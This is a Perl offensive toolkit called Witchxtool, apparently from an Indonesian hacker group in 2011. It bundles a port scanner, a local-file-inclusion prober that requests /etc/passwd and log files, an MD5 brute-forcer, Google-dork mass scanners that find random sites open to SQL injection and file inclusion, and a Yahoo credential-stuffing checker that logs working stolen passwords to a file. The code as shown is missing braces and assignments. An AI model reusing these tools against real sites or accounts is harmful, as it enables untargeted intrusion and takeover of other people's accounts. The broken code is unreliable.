Witchxtool is a perl script that consists of a port scanner, LFI scanner, MD5 bruteforcer, dork SQL injection scanner, fresh proxy scanner, and a dork LFI scanner.
## .__ __ .__ __ .__
#__ _ _|__|/ |_ ____ | |__ ___ ____/ |_ ____ ____ | |
#\ \/ \/ / \ __\/ ___\| | \\ \/ /\ __\/ _ \ / _ \| |
# \ /| || | \ \___| Y \> < | | ( <_> | <_> ) |__
# \/\_/ |__||__| \___ >___| /__/\_ \ |__| \____/ \____/|____/ V.1.1
# \/ \/ \/
#Author : th3_w1tch (th3_w1tch <at> coconutstmik.com)
#Home : http://makassarhacker.com
# http://th3w1tch.wordpress.com
# http://coconutstmik.com
#Thanks For :
#Makassar Ethical Hacker Crew
#COCONUT Computer Club STMIK Profesional & Enigma Group
use IO::Socket::INET;
use Net::RawIP;
use HTTP::Request;
use LWP::UserAgent;
use Term::ANSIColor;
use Digest::MD5 qw(md5_hex);
use LWP::UserAgent;
use LWP::Simple;
use Getopt::Std;
use WWW::Mechanize;
use Data::Validate::IP;
use HTTP::Cookies;
system (clear);
sub header{
print color "bold yellow";
print q(
# Witchxtool Ver.1.1 | Makassar Ethical Hacker #
# http://makassarhacker.com #
# Program Menu #
# 1. Port Scanner 4. Dork SQLI Scanner 7. Yahoo Password Checker #
# 2. LFI Scanner 5. Proxy Fresh Scanner 8. Help #
# 3. MD5 Brute Force 6. Dork LFI Scanner #
# Coding By th3_w1tch #
# http://th3w1tch.wordpress.com #
# MEH Project 2011 #
print colored ['red'], " Insert Program Number : ";
if ($number==1){
print colored ['white'],"Back to Menu Press ";
print colored ['yellow on_white'], " Enter";
system (clear);
if ($number==2){
print colored ['white'],"Back to Menu Press ";
print colored ['yellow on_white'], " Enter";
system (clear);
if ($number==3){
print colored ['white'],"Back to Menu Press ";
print colored ['bold white on_red'], " Enter";
system (clear);
if ($number==4){
print colored ['white'],"Back to Menu Press ";
print colored ['bold white on_red'], " Enter";
system (clear);
if ($number==5){
print colored ['white'],"Back to Menu Press ";
print colored ['bold black on_white'], " Enter";
system (clear);
if ($number==6){
print colored ['white'],"Back to Menu Press ";
print colored ['bold black on_white'], " Enter";
system (clear);
if ($number==7){
print colored ['white'],"Back to Menu Press ";
print colored ['bold black on_white'], " Enter";
system (clear);
if ($number==8){
print colored ['white'],"Back to Menu Press ";
print colored ['bold black on_white'], " Enter";
system (clear);
sub portscanner{
system (clear);
print color 'reset';
print color "green";
print q(
# Port Scanner #
# http://makassarhacker.com #
# usage -> Target : #
print "\n";
print "Target: ";
$target = <STDIN>;
chomp ($target);
$port = 1;
while($port <= 65535){
$ports = new IO::Socket::INET (
PeerAddr => $target,
PeerPort => $port,
Proto => "tcp");
if($ports){print "Open -> $port\n";}
sub lfiscanner{
system (clear);
print color 'reset';
print color "green";
print q(
# LFI Scanner #
# http://makassarhacker.com #
# usage -> Target : http://site.com/index.php?page= #
print "\n";
print "Target :";
chomp($target = <STDIN>);
if($target !~ /http:\/\//) { $target = "http://$target"; }
@lfi = ('/etc/passwd',
'/usr/local/apache/logs/access_ log',
'/usr/local/apache/logs/access. log',
'/Program Files\Apache Group\Apache\logs\access.log',
'/Program Files\Apache Group\Apache\logs\error.log',
print "Searching . . .\n";
foreach $scan(@lfi){
$url = $target.$scan;
$request = HTTP::Request->new(GET=>$url);
$ua = LWP::UserAgent->new();
$response = $ua->request($request);
if ($response->is_success && $response->content =~ m/:x:/) {print $url, " -> Vulnerable\n";}
elsif ($response->is_success && $response->content =~ m/"GET/) {print $url, " -> Vulnerable\n";}
elsif ($response->is_success && $response->content =~ m/DOCUMENT_ROOT/) {print $url, " -> Vulnerable\n";}
elsif ($response->is_success && $response->content =~ m/\[error\]/) {print $url, " -> Vulnerable\n";}
sub md5brute{
use Digest::MD5 qw(md5_hex);
system (clear);
print color 'reset';
print color "green";
print q(
# MD5 Brute Force #
# http://makassarhacker.com #
# usage -> Insert MD5 : 21232f297a57a5a743894a0e4a801fc3 #
# Insert Type [k/B/a/c]: k #
# Insert Min Length: 4 #
# Insert Max Length: 5 #
print "\n";
print "Insert MD5: ";
print "Insert Type [k/B/a/c]: ";
print "Insert Min Length: ";
print "Insert Max Length: ";
if ($type=~"k") {$char = "abcdefghijklmnopqrstuvwxyz";}
if ($type=~"B") {$char = $char. "ABCDEFGHIJKLMNOPQRSTUVWXYZ";}
if ($type=~"a") {$char = $char."1234567890";}
if ($type=~"c") {$char = $char. "!\"\$%&/()=?-.:\\*'-_:.;,";}
sub cari{
@tampung = ();
$shift = shift;
for ($i =0;$i<$shift;$i++){ $tampung[i] = 0;}
for ($i =0;$i<$shift;$i++){
if ($tampung[$i] > length($char)-1){
if ($i==$shift-1){
print color "red";
print "Password Not Found\n";
return false;
$pass = "";
for ($i =0;$i<$shift;$i++){ $pass = $pass . substr($char,$tampung[$i],1);}
$enkripsi = md5_hex($pass);
print "$pass -> $enkripsi -> $md5 \n";
if ($md5 eq $enkripsi){
print color "red";
print "Password Cracked = $pass\n";
print colored ['white'],"Back to Menu Press ";
print colored ['bold white on_red'], " Enter";
system (clear);
for ($x=$k;$x<=$p;$x++){
sub sqli{
system (clear);
print color 'reset';
print color "green";
print q(
# Dork SQLI Scanner #
# http://makassarhacker.com #
# usage -> SQLI DORK : news.php?id= #
print "\n";
print "SQLI Dork : ";
print "Scanning . . . \n";
print color 'reset';
for($start = 0;$start != 100*10;$start += 10)
$t = "http://www.google.com/search?hl=fr&q=".$dork."&btnG=Search&start=".$start;
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv: Gecko/20101203 Firefox/3.6.13");
$response = $ua->get($t);
if ($response->is_success)
$c = $response->content;
@stuff = split(/<a href=/,$c);
foreach $line(@stuff)
if($line =~/(.*) class=l/ig)
$out = $1;
$out =~ s/"//g;
$out =~s/$/\'/;
$ua = LWP::UserAgent->new;
$response = $ua->get($out);
$error = $response->content();
if($error =~m/SQL syntax/)
{print "$out -> ";
print colored ['red'],"Vulnerable MySQL\n";}
elsif($error =~m/Microsoft JET Database/ || $error =~m/ODBC Microsoft Access Driver/)
{print "$out -> ";
print colored ['red'],"Vulnerable MS Access\n";}
elsif($error =~m/Microsoft OLE DB Provider for SQL Server/ || $error =~m/Unclosed quotation mark/)
{print "$out -> ";
print colored ['red'],"Vulnerable MSSQL\n";}
elsif($error =~m/mysql_fetch_array()/ || $error =~m/mysql_num_rows()/)
{print "$out -> ";
print colored ['red'],"Vulnerable Blind!\n";}
elsif($error =~m/Microsoft OLE DB Provider for Oracle/)
{print "$out -> ";
print colored ['red'],"Vulnerable Oracle!\n";}
sub proxy{
system (clear);
print color 'reset';
print color "green";
print q(
# Proxy Fresh Scanner #
# http://makassarhacker.com #
# Proxy Fresh From http://proxylist.net #
print "\n";
print " Press Enter to Scanning";
print "Scanning. . . \n";
my $proxy = "http://www.proxylist.net/";
my $module = WWW::Mechanize->new();
my @links = $module->links();
foreach my $link (@links){
@url_str = split('/',$link->url());
@ip_str = split(/:/,$url_str[2]);
print $ip_str[0].":".$ip_str[1]."\n";
sub lfidork{
system (clear);
print color 'reset';
print color "green";
print q(
# Dork LFI Scanner #
# http://makassarhacker.com #
# usage -> Dork : index.php?option=com_ckforms #
# Vuln LFI : option=com_ckforms&controller= #
print "\n";
@lfi = (
print "Dork : ";
print "Vuln LFI : ";
print "Scanning . . .\n";
for($start = 0;$start != 100*10;$start += 10)
$t = "http://www.google.com/search?hl=fr&q=".$dork."&btnG=Search&start=".$start;
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv: Gecko/20101203 Firefox/3.6.13");
$response = $ua->get($t);
if ($response->is_success)
$c = $response->content;
@stuff = split(/<a href=/,$c);
foreach $line(@stuff)
if($line =~/(.*) class=l/ig)
$out = $1;
$out =~ s/"//g;
foreach $scan(@lfi){
$ua = LWP::UserAgent->new;
$response = $ua->get($get);
$error = $response->content();
#if($error =~ /DOCUMENT_ROOT=\// && $error =~ /HTTP_USER_AGENT/)
#{print color 'reset';print "$get"; print colored ['red']," -> LFI Vulnerable\n"}
if ($error=~ /:x:/)
{print color 'reset';print "$get"; print colored ['red']," -> LFI Vulnerable\n"}
print "Scan Finished\n";
sub yahoopasschecker{
system (clear);
print color 'reset';
print color "green";
print q(
# Yahoo Password Checker #
# http://makassarhacker.com #
# Insert your email and password list in a file check.txt #
# Format email:password -> abcdef@yahoo.com:123456 #
print " Press Enter to Start";
print "Check Login . . .\n";
open (MYFILE, 'check.txt');
while (<MYFILE>) {
if($_ =~ m/[a-z0-9_\.]\@yahoo(.*?):(.+){6,32}$/i or $_ =~ m/[a-z0-9_\.]\@ymail(.*?):(.+){6,32}$/i or $_ =~ m/[a-z0-9_\.]\@rocketmail(.*?):(.+){6,32}$/i){
@data = split(/:/, $_);
$myCookies = HTTP::Cookies->new();
my $ua = LWP::UserAgent->new;
$ua->agent('Mozilla/5.0 (X11; U; Linux i686; en-US; rv: Gecko/20101203 Firefox/3.6.13');
my $url = ("https://login.yahoo.com/config/login?login=".$username."&passwd=".$password);
my $login = $ua->get($url);
if ($login->is_success){
$respon = $login->content;
if ($respon=~m/Invalid ID or password/){print $username,":",$password," -> Login Failed\n";}
else {
open (FILE, '>>success.txt');
print FILE "$username",":","$password\n";
close (FILE);
print $username,":",$password," -> Login Success\n";}
close (MYFILE);
sub help{
system (clear);
print color 'reset';
print color "green";
print q(
# HELP Witchxtool #
# http://makassarhacker.com #
1. Port Scanner -> To know which port(1-65535) are open on the target
usage -> Target :
Open -> 53
Open -> 139
Open -> 445
2. LFI Scanner -> Find vulnerable local file inclusion on a website
usage -> Target : http://site.com/index.php?page=
3. MD5 BruteForce -> Perform experiments on all keys that may be the result of the MD5 encryption
usage -> Insert MD5 : 21232f297a57a5a743894a0e4a801fc3
admin = 21232f297a57a5a743894a0e4a801fc3
Insert Type [k/B/a/c]:kB
k= Lowarcase [a-z]
B= Upper case [A-Z]
a= Number [0-9]
c= Character symbol [!"$%&/()=?-.:\*'-_:.;,"]
Insert Min Length : 4
Insert Max Length : 5
4. Dork SQLI Scanner -> Searching of websites that are vulnerable SQL Injection randomly using google engine according dork
usage -> SQLI DORK : news.php?id=
5. Proxy Fresh Scanner -> Looking for a proxy by utilizing the site http://proxylist.net
6. Dork LFI Scanner -> Searching of websites that are vulnerable LFI (Local File Inclusion) randomly using google engine according dork
usage -> Dork : index.php?option=com_ckforms
Vuln LFI : option=com_ckforms&controller=
7 Yahoo Password Checker -> Check the password account yahoo with a large number.
Insert your email and password list in a file check.txt
Format email:password -> abcdef@yahoo.com:123456
after the checking process is completed will form a success.txt file that contains the correct password account yahoo
#Makassar Ethical Hacker Project 2011
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